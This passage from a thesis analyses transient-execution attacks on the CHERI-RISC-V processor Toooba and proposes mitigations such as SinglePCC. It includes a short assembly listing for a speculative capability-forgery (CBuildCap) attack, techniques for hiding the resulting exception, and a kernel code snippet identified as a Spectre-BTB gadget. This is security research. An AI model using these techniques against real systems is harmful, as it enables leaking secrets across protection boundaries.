
operations. First, the capability checks have to be conducted. Second, if the

capability checks were successful, the input capability bit pattern is tagged –

therefore becomes a valid capability – and written to the destination register.

The main part of the attack code is depicted in Figure 5.7. This code is

expected to run in an attacker controlled compartment whose PCC is limited

to certain addresses. In this scenario, the attacker can be a user that now acts as

an adversary on a CHERI system. The goal of the attacker is to speculatively

craft a powerful capability in order to read secrets of other compartments.

The register a0 holds the index to be used to access the speculatively created

capability and ca1 holds the bit pattern to be used with CBuildCap. The

index is shifted logically left by four bits in order to produce 16 byte memory

chunks to be accessed. The attack is designed such that the load following

the shift instruction will miss all caches and therefore produces the maximum

load penalty possible. The CBuildCap instruction is not dependent on the

previous instructions and can be executed out-of-order before the load has to

finish. In fact, all instructions following the load are not dependent on the

load. Therefore, all of these instructions can be executed before the slow load

finishes, but none of them can commit before the load commits.

The CBuildCap instruction has cs1 as authorising capability, which is

derived from DDC, but limited to the addresses [0x80001000−0x80002000],

which in my example is the most powerful data capability the attacker has

access to. The bit pattern passed in ca1 is the almighty capability spanning

the entire address space with the tag bit stripped. However, this breaks the

invariant that the authorising capability must be equally or more powerful than

the bit pattern. The CBuildCap instruction will fail, but for now we assume

that it does not and that all subsequent instructions will be executed normally.

Next, the attack uses the index calculated before and adds it to the capability

address. This is the address of the secret value, which is loaded in the next

instruction. This secret value is used as an index to a user accessible array,

Page 66: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 53

access_funct:

// a0: index to 16 byte chunks

// ca1: bit pattern for capability to be build

slli a0, a0, 4

// misses all caches and produces

// maximum miss penalty

cld t1, 0(cs1)

// will raise an exception, but before

// that it will reveal the secret

cbuildcap ct2, cs1, ca1

cincoffset ct2, ct2, a0

// load twice to reveal secret

cld t0, 0(ct2)

cincoffset cs7, cs7, t0

cld t0, 0(cs7)

cret

Figure 5.7: Overview of the CBuildCap attack code.

which cs7 is the base address of. The load to this address reveals the secret

to the attacker as they can probe the user accessible array later in order to find

out the secret value.

Toooba’s ALU has four pipeline stages: Dispatching the instruction to

the ALU, reading the register values, doing the actual operation, and writing

back the calculated value. Toooba reverses the order of the sub-operations for

CBuildCap in order to improve performance. It first tags the input data and

then performs the capability checks, which are called CapMod and CapCheck

in Figure 5.8. This means that there exists a tagged capability that has not

been checked yet in the actual executing stage. In the next stage, the writeback

stage called FinishALU in Figure 5.8, Toooba performs the actual checks and

finishes the execution of CBuildCap by marking it as executed in the ROB.

This will also set a field in the ROB that this instruction created an exception.

In order to improve performance Toooba uses forwarding of ALU results to

subsequent operations. In general, forwarding avoids stall cycles that would be

introduced by writing the result to the register file and other operations having

to wait to read this value. Toooba, uses forwarding in both the ExeAlu and the

FinishALU stage as well as writing the data to the register file in the FinishALU

stage. For my attack, this means that the powerful tagged capability will be

Page 67: Analysis of Transient-Execution Attacks on the out-of

54 CHAPTER 5. CHERI-RISC-V RESULTS

RegisterFile

ExeALU

CapMod

speculativecapabilityvalues

trapcode

FinishALU

CapCheck ReorderBuf

Figure 5.8: The last two stages of the Toooba ALU pipeline which forwards

modified capabilities before performing capability checks.2

forwarded to subsequent instructions which use the result of the CBuildCap

instruction.

An instruction commits when it is at the head of the ROB. Toooba raises

an exception at the commit phase because at this point of time it is certain

that the exception really occurred as the exception could have also come from

a speculative execution path that should not have been taken. In the mean-

time, the speculatively crafted almighty capability can be freely used to access

the entire memory space, e.g., to read secret memory of other compartments.

This is possible because – as many other processors – Toooba does not stall

its pipeline in case of a speculative hardware exception in order to increase

performance.

The attack – as depicted in Figure 5.7 – will cause the operating system to

react to the hardware exception being raised. This will lead to the termination

of the process running this code, which can be disadvantageous for the attacker

for two reasons. First, the attacker often wants to conduct the attack multiple

times and therefore wants to keep the victim process running. Second, the

exception will entail a call to the operating system’s exception handler, which

will perform load operations itself and therefore might cause a lot of noise

from the attacker’s point of view.

As described in [27], an attacker has multiple options to hide the exception.

One option is to fork a child process and execute the attack code there. This

will solve the problem of keeping the actual attack process open, but still the

child process will trigger the invocation of the exception handler and poten-

tially make the results useless because of noise. Another option is to hide the

CBuildCap instruction and the transiently executed instruction sequence in

a speculative frame. This means that I insert a branch instruction before the

2This figure is borrowed from the CHERI team

Page 68: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 55

CBuildCap instruction with a branch target that lies after the second tran-

sient load. The branch instruction needs to be slow to resolve for Toooba,

which can be achieved by making the branch instruction dependent on a load

that misses all caches. I train the branch so that the actual attack code path

will always be predicted to be taken as explained in Section 5.1.1. During the

actual attack, I provide parameters such that the attack code will eventually not

be taken. Therefore, the attack code still is executed speculatively, but the ex-

ception is hidden because of the rollback that Toooba will eventually perform.

This step is combining the CBuildCap attack with a Spectre-PHT attack

as suggested by Lipp et al. [27]. This solves both keeping the process open

and avoiding the invocation of the exception handler because the exception

never occurs on the architectural level. One drawback is that the effective

speculative window for the attacker becomes smaller due to an extra instruction

that has to be executed before the actual attack code. However, this proves to

be no problem in Toooba and I have successfully crafted this variant of the

CBuildCap attack.

Another mechanism proposed in [27] is the use of transactional memory.

If a failure occurs in a sequence of memory accesses that are made transac-

tional by the architecture, all operations in that transaction will be rolled back.

However, effects to the cache might have already taken place and secrets can

be leaked therefore. RISC-V mentions the Standard Extension for Transac-

tional Memory. However, this has not been specified yet [11]. Therefore, this

cannot be used on RISC-V architectures to hide an exception.

CSetBounds

This attack is comparable to the CBuildCap attack presented above. The

goal of the attack is to extend the bounds of a capability, which breaks the

monotonicity constraint of CHERI capabilities. The CSetBounds instruc-

tion sets the bounds of a capability while ensuring monotonicity. If the new

value for the bounds is greater than the value so far, an exception will be

raised [37]. The attack is performed the same way the CBuildCap attack

was performed. A load that misses all caches – or any instruction that intro-

duces a delay long enough – enables the transient-execution sequence to take

effect before the exception caused by the CSetBounds instruction is raised.

The transient-execution sequence comprises the following steps: setting the

address to a value of interest for the attacker, accessing that value, and finally

accessing an attacker-visible array with the secret as the index in order to leak

the secret.

Page 69: Analysis of Transient-Execution Attacks on the out-of

56 CHAPTER 5. CHERI-RISC-V RESULTS

Analogous to the CBuildCap attack, the CSetBounds attack will raise

an exception in the form presented above. As explained, hiding the exception

in a speculative frame is the best option for an attacker. I have successfully

implemented both a variant that eventually raises a hardware exception and a

variant that hides the exception.

CInvoke

Both the CBuildCap and the CSetBounds attack operate on conventional

unsealed data capabilities. In contrast, this attack works on sealed capabilities.

Sealed capabilities cannot be dereferenced and thus are not of great use to an

attacker. Therefore, it is the attacker’s goal to unseal this data capability and

access the memory addresses it grants access to. Since sealed capabilities

cannot be dereferenced, it is deemed secure to pass them to non-trustworthy

processes. This way, an attacker can get access to a sealed data capability.

The CInvoke instruction was designed to allow fast jumps between pro-

tection domains. This is enabled by having a sealed code capability to the code

the user wants to jump to and by a sealed data capability – these two capabili-

ties together form a pair of capabilities. CInvoke unseals the code capability

and jumps to it. Furthermore, it unseals the data capability and moves it into a

general purpose capability register. In order to be considered a valid operation,

CInvoke needs to pass many checks, e.g. both capabilities need to be tagged

and sealed. In my scenario, I primarily attack the fact that the capability pair

is required to have the same otype. However. I violate multiple other in-

variants as well [37]. A failure of these checks will lead to an exception being

raised by Toooba.

My approach for the attack is to use a code capability that points to a gadget

in the attackers code space. For the data capability, I use a powerful sealed

capability that the attacker does not have a suitably authorising capability to

unseal. The CInvoke instruction is executed with these two capabilities as

parameters. In order to delay the exception being raised, a load missing all

caches is used again. With the exception being delayed, the code speculatively

jumps to the attacker’s chosen gadget and the data capability is unsealed and

forwarded. The gadget loads the secret and reveals it by a second transient

load. Hiding the exception in a speculative frame is again the best way of

conducting this exploit from an attacker’s perspective.

Page 70: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 57

CUnseal

Similar to the attack above, the goal of this attack is to unseal a capability

without having the necessary privileges. The CUnseal instruction requires

two parameters: the capability to be unsealed and the capability authorising

this. If the CUnseal instruction fails, a hardware exception will be raised.

For CUnseal, there are multiple reasons why this instruction can fail – in my

attack I focus on a TypeViolation. This is caused if the otype of the sealed

capability is not equal to the address of the authorising capability [37]. Again,

in my attack scenario, the attacker has already obtained a powerful sealed data

capability or can obtain it when needed, e.g., reading from shared memory

with another process running on the CHERI system.

The actual attack approach is similar to the CInvoke attack. The attacker

does not possess a suitable capability that allows unsealing the powerful data

capability. In order to delay the exception being raised, the attacker performs a

load with a great miss penalty. Toooba’s forwarding again enables a transient-

execution sequence to make a secret visible to the attacker. If an attacker wants

to conduct the attack more than once, hiding the exception in a speculative

execution frame is the best solution.

Page 71: Analysis of Transient-Execution Attacks on the out-of

Chapter 6

Discussion

One of the main goals of this thesis work is to contribute a platform to foster

research of transient-execution attacks both on RISC-V and CHERI-RISC-V

processors. The experiments presented in Chapters 4 and 5 show vulnera-

bilities being present in Toooba and the need to develop and deploy mitiga-

tion mechanisms. In this chapter, I describe how my framework impacted the

CHERI team and helped to develop and improve SinglePCC – a mitigation

mechanism against Spectre-style attacks in CHERI-RISC-V Toooba. Further-

more, my work has triggered initial plans for Meltdown-CF mitigation.

6.1 SinglePCC

The SinglePCC mechanism has been mainly developed by Jonathan Woodruff

and was inspired by my experiments and their results as all Spectre-style at-

tacks were found to violate CHERI’s security model.

6.1.1 Mechanism

As of now, CHERI-RISC-V Toooba uses the entire PCC of the target for branch

prediction, which means that both the actual address and also the privileges

including the bounds are predicted. SinglePCC removes the privileges com-

pletely from the prediction. In order to determine whether an instruction is in

bounds, it uses the PCC bounds of the last committed instruction. Whenever

an instruction that changes the bounds, e.g., a cjalr instruction is executed,

the bounds will be changed at well. The BTB or RSB only carry the address

and no bounds or other privileges any longer. If the address of an instruc-

tion is out-of-bounds of the current bounds, e.g., a target of a jump to another

58

Page 72: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 6. DISCUSSION 59

compartment, this instruction has to wait until its bounds can be derived from

the current register state without speculation. This approach will decrease the

overall system performance as additional pipeline flushes can be included by

waiting for the bounds to be in the register state, but this approach does not

allow any speculation over compartment boundaries.

6.1.2 Testing SinglePCC

I ran all major Spectre-style attacks on the branch of Toooba that has been ex-

tended with SinglePCC. The results are summarised in Table 6.1. SinglePCC

successfully mitigates attacks that target injecting an address into the BTB or

RSB that is located at an address out-of-bounds of the PCC for this compart-

ment or part of the code, e.g., a function whose PCC is exactly limited to its

respective code. A jump to another compartment is possible – but not in spec-

ulation. This leads to the fact that the attacker chosen gadget will never be

executed. However, SinglePCC does not mitigate the following attack case: I

assume to have two identical compartments that only differ in having different

ASIDs. Furthermore, one compartment is under control of the attacker, the

other compartment is benign. The compartment under attacker control can

inject an entry into the BTB or RSB and when the benign compartment is ex-

ecuted the next time, it will follow the misprediction. Capabilities describe

virtual addresses, but do not contain any information about address spaces.

SinglePCC mandates that the address in speculation must be in the current

bounds, but this does not forbid this case of cross protection domain training

because SinglePCC does not know about the different address spaces.

Furthermore, SinglePCC does not mitigate Spectre-PHT nor does it mit-

igate Spectre-STL-Load. In the case of Spectre-PHT, the attacker only mis-

trains the branch prediction direction, but both the target in case of taken and

the target in case of not taken are in the current bounds, which means that

SinglePCC does not take effect here. For Spectre-STL-Load, the reason is

similar. This attack loads a stale memory value, but it does not affect branch

targets and therefore the address always stays within the current bounds. How-

ever, SinglePCC mitigates Spectre-STL-Jump if the jump goes out-of-bounds

for the same reasons as SinglePCC mitigates Spectre-BTB and Spectre-RSB.

Last, SinglePCC only mitigates attacks that involve jumping. Therefore, Sin-

glePCC does not mitigate any of the Meltdown-CF attacks.

With SinglePCC enabled, an attacker cannot train the BTB with targets

outside of the bounds of the current PCC. However, the attacker can train the

BTB with targets in bounds. In the case the current bounds are not tight, this

Page 73: Analysis of Transient-Execution Attacks on the out-of

60 CHAPTER 6. DISCUSSION

asm CHERI asm

Spectre-PHT ✓ ✓

Spectre-BTB ✓ ✗

Spectre-RSB ✓ ✗

Spectre-STL-Load ✓ ✓

Spectre-STL-Jump ✓ ✗

Table 6.1: Overview of attempted Spectre-style attacks and whether they were

successful when SinglePCC is applied.

gives the attacker a higher probability to find a suitable gadget in the victim’s

code.

6.1.3 Hardening SinglePCC

Running the Spectre-style transient-execution attacks in Toooba with

SinglePCC being enabled revealed a dangerous vulnerability in the initial Sin-

glePCC implementation. My example of Spectre-RSB worked even though

the return address injected into the RSB was out-of-bounds of the current

PCC of the victim. This could be traced back to an error in the microarchi-

tecture in collaboration with Jonathan Woodruff. In my example, the victim

PCC starts at address 0x80040000, whereas the attacker PCC starts at address

0x80080000. The entire PCCs of the victim (PCCv) and the attacker (PCCa)

are:

PCCv = 0xffff200000018004_0000000080040000 (6.1)

PCCa = 0xffff200000018004_0000000080080000 (6.2)

In order to understand the error in the microarchitecture, I need to ex-

plain CHERI Concentrate [38] – the compression mechanism used in order

to achieve 128-bit capabilities. As depicted in Figure 6.1, CHERI Concen-

trate divides the memory space into three different parts from the view of one

capability: the unrepresentable region, the representable space, and the deref-

erenceable region.

In the erroneous SinglePCC implementation, Toooba pulled the address

from the RSB and then applied a function that adds the bounds of the current

PCC. In order to improve overall performance – to shorten the critical path

Page 74: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 6. DISCUSSION 61

base

address

top

Unrepresentable region

Representable space

Dereferenceable region

Figure 6.1: Memory regions implied by the CHERI Concentrate encoding.

Taken and adapted from Woodruff et al. [38].

– the implementors used a function that sets the address, but does not check

whether the address is representable. This function is unsafe, but superior

to its safe counterpart in terms of performance. Because of the alignment of

the victim and attacker PCC, they have the same encoding through CHERI

Concentrate. PCCv and PCCa differ only in the actual address, but the com-

pressed bounds bits are identical. In general, CHERI Concentrate can have

multiple memory regions whose bounds are encoded with the same bit pat-

tern – all these capabilities only differ in the actual address. The unsafe set of

the address leads to the fact that the attacker address pulled from the RSB is

considered in bounds. Therefore, the bounds check following the address set-

ting function will not fail and Toooba will speculatively jump to the attacker’s

gadget and therefore the entire attack succeeds.

My findings caused the SinglePCC implementation to be reviewed and

changed accordingly. A more costly but safe function for setting the address

coming from the RSB is used in the current design. This function will check

whether the address is in the unrepresentable region and this fact will cause

the function to strip the capability’s tag bit in my attack case. In turn, this

invalid capability will not pass the bounds checks and therefore Toooba will

not speculatively jump to this address – as it is intended to work.

Later, Woodruff implemented another approach that decodes the bounds

of the current PCC and writes them to hardware registers. These bounds are

then used for comparing against addresses coming from the BTB and RSB.

Only in case of a jump that is architecturally taken, these bounds registers will

change.

Page 75: Analysis of Transient-Execution Attacks on the out-of

62 CHAPTER 6. DISCUSSION

ld a0, 1000(s5)

ld a1, 208(a0)

add a0, zero, s1

jalr ra, a1

Figure 6.2: CheriBSD kernel code that is suitable for a Spectre-BTB attack.

6.1.4 Spectre-BTB in Kernel Code

In order to confirm the need for mechanisms that mitigate Spectre-style at-

tacks, I present a possible vulnerability that would allow to bypass CHERI’s

security measures in a real-world environment. In this section, I describe the

possible attack of a CHERI system using the presence of an operating system –

in this case CheriBSD. In this attack scenario, I use the hybrid-kernel version

of CheriBSD, which means that the kernel itself does not use capabilities for

its code and data, but the kernel fully enables user-space programs to do so.

In Figure 6.2, I show a short snippet of the CheriBSD kernel code for han-

dling exceptions. The reader may note that this code is not CHERI-RISC-V

assembly, but conventional RISC-V assembly. This is caused by the fact that

the kernel itself does not use capabilities. This code is part of the syscal-

lenter function, which is indirectly called by the do_trap_user function

– the function that handles exceptions coming from U privilege mode. The

code depicted in Figure 6.2 fulfills all the criteria in order to be exploitable

for a Spectre-BTB attack. As described in Section 5.1.3, the goal of the at-

tacker is to alias an indirect jump, which is in this example jalr ra, a1.

Furthermore, the attacker has to ensure that load operation writing into a1 is

delayed, e.g., by making it miss all caches. This will lead to a misspeculation

to the attacker’s gadget that has been injected to the BTB previously.

This kind of attack is a large threat to CHERI systems as it gives attack-

ers powerful capabilities normally used by the kernel. The attacker could at-

tempt to find a powerful capability, e.g., derived from a SCR or a CSR, that

still is in the register state from calls to previous functions. However, the fact

that the kernel is not using capabilities gives the attacker another option to

conduct impactful attacks. For memory operations not issued through capa-

bilities, CHERI systems implicitly use the DDC register. In order to satisfy

the wide range of memory accesses performed by the kernel, the capability in

DDC has to be suitably powerfully configured. In case of an attack, the DDC

register can be used by attackers as well and gives them plenty of options to

attack CheriBSD’s kernel through Spectre-BTB attacks.

Page 76: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 6. DISCUSSION 63

As presented in Section 6.1.2, SinglePCC will mitigate attacks that are

based on Toooba misspeculating to another compartment. In order to success-

fully mititgate the attack above, SinglePCC requires the bounds for the kernel

PCC to be tightly bound. If this is not the case, SinglePCC will not mitigate

this attack as no out-of-bounds jump will be detected. Therefore, this example

illustrates again how important it is for the overall security of a CHERI system

to be configured with the principle of least privilege. Furthermore, it shows

the importance of the framework I created during my work.

6.2 Preventing Meltdown-CF

The Meltdown-CF attacks explained in Section 5.2.3 pose a large threat to

CHERI systems. The analysis presented in this work inspired CHERI hard-

ware designers to propose solutions that are outlined in the following para-

graphs. All Meltdown-style attacks are caused by exceptions not being raised

at the right point of time in the pipeline, which leads to illegal data being

forwarded and used in transient-execution sequences. As explained in Sec-

tion 2.4.5, CHERI implementations need to prevent Meltdown-CF attacks.

This can be done both architecturally and microarchitecturally.

Jonathan Woodruff and Peter Rugg proposed in several personal meetings

that the ISA could be changed such that instructions in the Meltdown-CF sub-

class no longer throw hardware exceptions, but instead forward invalid capa-

bilities in case of a failure. This will entirely prevent transient-execution from

taking effect as memory operations through invalid capabilities are not allowed

and will lead to a hardware exception in Toooba.

Furthermore, Woodruff and Rugg presented the idea of changing the mi-

croarchitecture only without adjusting the ISA. They propose to not write any

capability to the physical register file that exceeds the privileges of its operands

even if only used in a transient path. This will prevent any privilege escalation.

Both approaches have a common denominator as the capability checks

need to be resolved before writing any value to the physical register file. Wood-

ruff and Rugg state further that this will not have a performance impact on

CUnseal and CInvoke, but it will cost performance for the CBuildCap and

CSetBounds instructions due to capability compression being on the ciritical

path.

Page 77: Analysis of Transient-Execution Attacks on the out-of

64 CHAPTER 6. DISCUSSION

6.3 Ethics and Sustainability

When conducting attacks for scientific reason, it has to be ensured that both no

harm to real-world systems is done and that the attack is responsibly disclosed.

Responsible disclosure means that the attackers wait a period of time before

disclosing the vulnerability such that affected systems have enough time to take

measures. Publications about transient-execution attacks followed these prin-

ciples from the beginning [22, 27]. I complied with these principles through-

out my thesis work as well. Whilst performing my attacks, I only operated on

a simulation running on a server and therefore did no harm to any real-world

system. Toooba is a research processor in development whose purpose is to

enable security research. Therefore, I can disclose the found vulnerabilities

immediately with the publication of this thesis. One goal of this thesis was to

provide a platform for further research on these attacks.

Another goal was to show the possibility for transient-execution attacks.

As described in previous sections in this chapter, my research has led to initial

mitigation mechanisms being put in place in Toooba. This will inspire hard-

ware designers to develop more sophisticated mitigation mechanisms that will

strengthen CHERI’s security claims. The computer science society is now

aware that transient-execution attacks affect many microarchitectures and that

mitigation mechanisms are crucial.

A point often overlooked is sustainability. Modern computing can help to

sustainably use resources, e.g., smart irrigation systems. However, all systems

need computing power in order to make decisions that benefit sustainability.

My research will lead to CHERI systems becoming more secure. CHERI’s

strong security claims will remove concerns about security and therefore foster

the use of CHERI in sustainable systems.

6.4 Future Work

This thesis work answered the question of whether transient-execution attacks

are possible in Toooba and CHERI systems in general. However, many ques-

tions still remain unanswered – especially regarding more advanced transient-

execution attacks running in a real-world environment. Currently, Toooba is

fairly conservative and is not yet instantiated with a multi-core setup. This ef-

fectively mitigates advanced transient-execution attacks, but also significantly

limits performance. Changes on a per core basis, e.g., adding sophisticated

data-value speculation to the processor will enrich the microarchitectural state,

Page 78: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 6. DISCUSSION 65

which will give an attacker plenty of options to attempt transient-execution at-

tacks on a RISC-V or CHERI-RISC-V system. This means that future work

will aim to improve Toooba’s performance and evaluate whether a richer mi-

croarchitectural state leads to the possibility of sophisticated transient-execution

attacks.

It is not yet clear how CHERI capabilities interact with transient-execution

attacks. For the most cases, capabilities are an obstacle for an attacker, but they

can be of advantage as well. Considering a single-address-space operating sys-

tem as proposed in [37], speculative bounds escalation can pose a large threat

to CHERI systems as the CBuildCap attack example has shown. It has to be

researched whether there exist other ways to escalate privilege in speculation.

Furthermore, other interactions in a full operating system environment are of

interest to the attacker, e.g. achieving longer load miss penalties by creating

TLB misses. Besides the feasibility of an attack, the quality of possible attacks

has to be investigated. CHERI-RISC-V systems differ in instruction sequences

from conventional RISC-V systems and are likely to introduce noise, e.g., ca-

pababilities have to be loaded from a capability table first. These loads can

impact cache traces and therefore can change the transmission rates in real-

word attacks.

In general, my work has looked at Toooba only in simulation through veri-

lator. An instance of Toooba being synthesised to a Field Programmable Gate

Array (FPGA) will bring new insights and make the results more robust. Fur-

thermore, it would be interesting to conduct research on transient-execution

attacks on the ARM Morello architecture [49]. The different design choices

and the different underlying ISA will likely have an impact on which attacks

are successful and what their respective quality is.

Page 79: Analysis of Transient-Execution Attacks on the out-of

Chapter 7

Conclusions

In this work, I performed initial research on transient-execution attacks on

the superscalar out-of-order CHERI-RISC-V microprocessor Toooba. I can

clearly answer the question of whether Toooba is vulnerable to transient-execu-

tion attacks in the affirmative. In both RISC-V and CHERI-RISC-V assembly,

I could successfully conduct transient-execution attacks. This work was the

first to completely reproduce the major transient-execution attacks on a RISC-

V processor and it was the first work to attempt attacks of this class against

CHERI capability protection. I find that transient-execution attacks violate

CHERI’s security model in two ways and therefore require mitigation and pre-

vention mechanisms to be put into place. First, control-flow can be hijacked

through Spectre-BTB and Spectre-RSB allowing attackers to direct control to

their chosen gadgets in speculation. Second, Meltdown-Capability-Forgery

poses a large vulnerability as attackers can transiently escalate privilege. I

showed that both subclasses of transient-execution result in a large threat to

code running on Toooba. I believe that both attack classes can be prevented or

mitigated by security mechanisms currently being developed. However, I be-

lieve that further findings have yet to be made about transient-execution attacks

on CHERI-RISC-V microprocessors. I further think that transient-execution

attacks will significantly impact threat models and hardware design of any mi-

croarchitecture in the future, and especially capability systems as they assure

high security measures. This work builds the basis for advanced research on

transient-execution attacks on RISC-V microprocessors. Furthermore, it sets

the stage for a first generation of commercial CHERI microprocessors to en-

sure that CHERI’s strong architectural guarantees are also non-bypassable in

speculation.

66

Page 80: Analysis of Transient-Execution Attacks on the out-of

Bibliography

[1] The MITRE Corporation. CVE-2014-0160. https://cve.mitre.

org/cgi-bin/cvename.cgi?name=CVE-2014-0160. 2013.

[2] Trevor Jim et al. “Cyclone: A Safe Dialect of C”. In: Proceedings of

the General Track of the Annual Conference on USENIX Annual Tech-

nical Conference. ATEC ’02. USA: USENIX Association, June 2002,

pp. 275–288. isbn: 1880446006.

[3] George C. Necula, Scott McPeak, and Westley Weimer. “CCured: Type-

Safe Retrofitting of Legacy Code”. In: Proceedings of the 29th ACM

SIGPLAN-SIGACT Symposium on Principles of Programming Languages.

POPL ’02. Portland, Oregon: Association for Computing Machinery,

Jan. 2002, pp. 128–139.

[4] Archibald Samuel Elliott et al. “Checked C: Making C Safe by Ex-

tension”. In: 2018 IEEE Cybersecurity Development (SecDev). Cam-

bridge, MA, USA, Sept. 2018, pp. 53–60.

[5] Thomas Bourgeat et al. “MI6: Secure Enclaves in a Speculative Out-of-

Order Processor”. In: Proceedings of the 52nd Annual IEEE/ACM In-

ternational Symposium on Microarchitecture. MICRO ’52. Columbus,

OH, USA: Association for Computing Machinery, Oct. 2019, pp. 42–

56.

[6] Marno van der Maas and Simon W. Moore. “Protecting Enclaves from

Intra-Core Side-Channel Attacks through Physical Isolation”. In: Pro-

ceedings of the 2nd Workshop on Cyber-Security Arms Race. CYSARM’20.

Virtual Event, USA: Association for Computing Machinery, Nov. 2020,

pp. 1–12.

[7] Maurice V. Wilkes and Roger M. Needham. The Cambridge CAP Com-

puter and Its Operating System. Elsevier, Jan. 1979.

67

Page 81: Analysis of Transient-Execution Attacks on the out-of

68 BIBLIOGRAPHY

[8] William B. Ackerman and William W. Plummer. “An implementation

of a multiprocessing computer system”. In: SOSP ’67: Proceedings of

the First ACM Symposium on Operating System Principles. New York,

NY, USA: ACM, 1967, pp. 5.1–5.10.

[9] Dmitry Evtyushkin et al. “BranchScope: A New Side-Channel Attack

on Directional Branch Predictor”. In: Proceedings of the Twenty-Third

International Conference on Architectural Support for Programming

Languages and Operating Systems. ASPLOS ’18. Williamsburg, VA,

USA: Association for Computing Machinery, Mar. 2018, pp. 693–707.

[10] Krste Asanović and David A. Patterson. Instruction Sets Should Be Free:

The Case For RISC-V. Tech. rep. UCB/EECS-2014-146. University of

California at Berkeley, Electrical Engineering and Computer Sciences,

Aug. 2014.

[11] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction

Set Manual. Document Version 20191213. Volume I: User-Level ISA.

RISC-V Foundation. Dec. 2019.

[12] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction

Set Manual. Document Version 20190608-Priv-MSU-Ratified. Volume

II: Privileged Architecture. RISC-V Foundation. June 2019.

[13] Robert M. Tomasulo. “An Efficient Algorithm for Exploiting Multiple

Arithmetic Units”. In: IBM Journal of Research and Development 11.1

(1967), pp. 25–33.

[14] David A. Patterson and John L. Hennessy. Computer Organization and

Design, RISC-V Edition: The Hardware/Software Interface. 6th. San

Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn:

9780128122754.

[15] John L. Hennessy and David A. Patterson. Computer Architecture: A

Quantitative Approach. 6th. San Francisco, CA, USA: Morgan Kauf-

mann Publishers Inc., 2017. isbn: 9780128119068.

[16] David M. Gallagher et al. “Dynamic Memory Disambiguation Using

the Memory Conflict Buffer”. In: Conference on Architectural Support

for Programming Languages and Operating Systems. San Jose, CA,

USA, Oct. 1994.

[17] Martin Schwarzl et al. Speculative Dereferencing of Registers: Reviving

Foreshadow. Aug. 2020. arXiv: 2008.02307.

Page 82: Analysis of Transient-Execution Attacks on the out-of

BIBLIOGRAPHY 69

[18] Yuval Yarom and Katrina Falkner. “FLUSH+RELOAD: A High Res-

olution, Low Noise, L3 Cache Side-Channel Attack”. In: USENIX Se-

curity Symposium. San Diego, CA: USENIX Association, Aug. 2014,

pp. 719–732.

[19] Claudio Canella et al. “A Systematic Evaluation of Transient Execution

Attacks and Defenses”. In: Proceedings of the 28th USENIX Conference

on Security Symposium. SEC’19. Santa Clara, CA, USA: USENIX As-

sociation, Aug. 2019, pp. 249–266.

[20] Jo Van Bulck et al. “LVI: Hijacking Transient Execution through Mi-

croarchitectural Load Value Injection”. In: 2020 IEEE Symposium on

Security and Privacy (SP). San Francisco, CA, USA, 2020, pp. 54–72.

[21] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-

structions (CHERI): Notes on the Meltdown and Spectre Attacks. Tech.

rep. UCAM-CL-TR-916. University of Cambridge, Computer Labora-

tory, Feb. 2018. url: https://www.cl.cam.ac.uk/techreports/

UCAM-CL-TR-916.pdf.

[22] Paul Kocher et al. “Spectre Attacks: Exploiting Speculative Execution”.

In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA,

May 2019.

[23] Esmaeil Mohammadian Koruyeh et al. “Spectre Returns! Speculation

Attacks Using the Return Stack Buffer”. In: Proceedings of the 12th

USENIX Conference on Offensive Technologies. WOOT’18. Baltimore,

MD, USA: USENIX Association, Aug. 2018.

[24] Giorgi Maisuradze and Christian Rossow. “Ret2spec: Speculative Exe-

cution Using Return Stack Buffers”. In: Proceedings of the 2018 ACM

SIGSAC Conference on Computer and Communications Security. CCS

’18. Toronto, Canada: Association for Computing Machinery, Jan. 2018,

pp. 2109–2122.

[25] Jan Horn. speculative execution, variant 4: speculative store bypass.

https://bugs.chromium.org/p/project-zero/issues/

detail?id=1528. Feb. 2018.

[26] Stephan Van Schaik et al. “RIDL: Rogue In-Flight Data Load”. In: IEEE

Symposium on Security and Privacy. San Francisco, CA, USA, May

2019.

[27] Moritz Lipp et al. “Meltdown: Reading Kernel Memory from User Space”.

In: Commun. ACM (May 2020), pp. 46–56.

Page 83: Analysis of Transient-Execution Attacks on the out-of

70 BIBLIOGRAPHY

[28] Jo Van Bulck et al. “Foreshadow: Extracting the Keys to the Intel SGX

Kingdom with Transient Out-of-Order Execution”. In: 27th USENIX

Security Symposium (USENIX Security 18). Baltimore, MD: USENIX

Association, 991–1008.

[29] Intel Corporation. Intel® Software Guard Extensions Developer Guide.

https://software.intel.com/content/www/us/en/

develop/documentation/sgx-developer-guide/top.

html. Sept. 2016.

[30] Intel Corporation. Deep Dive: Intel Analysis of L1 Terminal Fault. Tech.

rep. 2018. url: %5Curl%7Bhttps://software.intel.com/

security- software- guidance/advisory- guidance/

l1-terminal-fault%7D.

[31] Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Ab-

straction with Transient Out-of-Order Execution. Tech. rep. 1.0. Aug.

2018, p. 7. url: https://foreshadowattack.eu/foreshadow-

NG.pdf.

[32] Arm Limited. Cache Speculation Side-channels. Tech. rep. 2.5. 2020,

p. 21. url: https://developer.arm.com/support/arm-

security-updates/speculative-processor-vulnerability.

[33] Intel Corporation. Intel Analysis of Speculative Execution Side Chan-

nels. Tech. rep. 4.0. 2018, p. 16. url: https://www.intel.com/

content/www/us/en/architecture-and-technology/

intel-analysis-of-speculative-execution-side-

channels-paper.html.

[34] Vladimir Kiriansky and Carl Waldspurger. Speculative Buffer Overflows:

Attacks and Defenses. 2018. arXiv: 1807.03757 [cs.CR].

[35] Dag Arne Osvik, Adi Shamir, and Eran Tromer. “Cache Attacks and

Countermeasures: The Case of AES”. In: Proceedings of the 2006 The

Cryptographers’ Track at the RSA Conference on Topics in Cryptology.

CT-RSA’06. San Jose, CA: Springer-Verlag, 2006, pp. 1–20.

[36] Arm Limited. Arm v8.5-A CPU updates. https://developer.

arm.com/support/arm-security-updates/speculative-

processor-vulnerability. Version 1.4. June 2019.

